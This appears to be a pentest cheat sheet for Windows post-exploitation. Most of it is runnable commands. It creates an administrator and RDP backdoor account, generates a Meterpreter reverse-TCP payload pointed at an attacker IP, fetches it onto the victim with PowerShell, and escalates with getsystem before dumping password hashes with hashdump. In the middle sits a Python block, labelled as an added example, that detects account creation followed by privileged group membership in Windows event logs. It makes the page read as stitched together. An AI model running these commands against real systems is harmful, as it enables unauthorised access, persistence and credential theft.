Add RDP Account & Ride on Meterpreter
with initial foothold
Remote Desktop
net user pentest Pen.TE$t2024!1 /ADD
net localgroup "Remote Desktop Users" pentest /add
net localgroup "Administrators" pentest /add
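Defender-side view of the three commands above, as an added example that is not part of the original page: on a host with account-management auditing enabled, they produce Security event 4720 (user account created) followed by event 4732 (member added to a local group) for the same account SID. The records below are constructed and reduced to the fields used; the SIDs, timestamps, subject names and the 10-minute window are assumptions.

```python
from datetime import datetime, timedelta

# Well-known SIDs of the two built-in groups used in the commands above.
WATCHED_GROUPS = {"S-1-5-32-544": "Administrators",
                  "S-1-5-32-555": "Remote Desktop Users"}
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed sample records (4720 = account created,
# 4732 = member added to a security-enabled local group).
EVENTS = [
    {"id": 4720, "time": "2024-05-01T10:00:05", "TargetUserName": "pentest",
     "TargetSid": "S-1-5-21-1111-2222-3333-1005", "SubjectUserName": "websvc"},
    {"id": 4732, "time": "2024-05-01T10:00:09", "TargetSid": "S-1-5-32-555",
     "MemberSid": "S-1-5-21-1111-2222-3333-1005", "SubjectUserName": "websvc"},
    {"id": 4732, "time": "2024-05-01T10:00:12", "TargetSid": "S-1-5-32-544",
     "MemberSid": "S-1-5-21-1111-2222-3333-1005", "SubjectUserName": "websvc"},
    # Benign: existing account (no recent 4720) added to a watched group.
    {"id": 4732, "time": "2024-05-01T11:30:00", "TargetSid": "S-1-5-32-555",
     "MemberSid": "S-1-5-21-1111-2222-3333-1001", "SubjectUserName": "admin"},
    # Benign: new account added to an unwatched group (Users, S-1-5-32-545).
    {"id": 4720, "time": "2024-05-01T12:00:00", "TargetUserName": "intern",
     "TargetSid": "S-1-5-21-1111-2222-3333-1006", "SubjectUserName": "admin"},
    {"id": 4732, "time": "2024-05-01T12:00:03", "TargetSid": "S-1-5-32-545",
     "MemberSid": "S-1-5-21-1111-2222-3333-1006", "SubjectUserName": "admin"},
]

def find_new_privileged_accounts(events, window=WINDOW):
    """Return alerts for accounts created and then added to a watched
    group within `window`, keyed by the new account's SID."""
    created, alerts = {}, {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["TargetSid"]] = (ts, ev["TargetUserName"])
        elif ev["id"] == 4732 and ev["TargetSid"] in WATCHED_GROUPS:
            hit = created.get(ev["MemberSid"])
            if hit and ts - hit[0] <= window:
                alert = alerts.setdefault(ev["MemberSid"], {
                    "account": hit[1], "created": hit[0].isoformat(),
                    "by": ev["SubjectUserName"], "groups": []})
                alert["groups"].append(WATCHED_GROUPS[ev["TargetSid"]])
    return alerts

if __name__ == "__main__":
    for sid, alert in find_new_privileged_accounts(EVENTS).items():
        print(sid, alert)
```

Correlating on the member SID rather than the name matters because 4732 often records the member name of a local account as "-".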
Meterpreter
Payload generation
https://www.offsec.com/metasploit-unleashed/generating-payloads/
use payload/windows/meterpreter/reverse_tcp
set lhost 10.9.254.6
set lport 8888
generate -f exe -o /var/www/html/meterpreter.exe
Metasploit listener for meterpreter payload
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.254.6
set lport 8888
run
Transfer meterpreter.exe
apache2ctl start
Connect via RDP to the victim and start PowerShell
$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"
Invoke-WebRequest -URI $URL -OutFile $Path
Run meterpreter.exe
Start meterpreter.exe "As Administrator"

Getsystem & hashdump
meterpreter> getsystem
meterpreter> hashdump
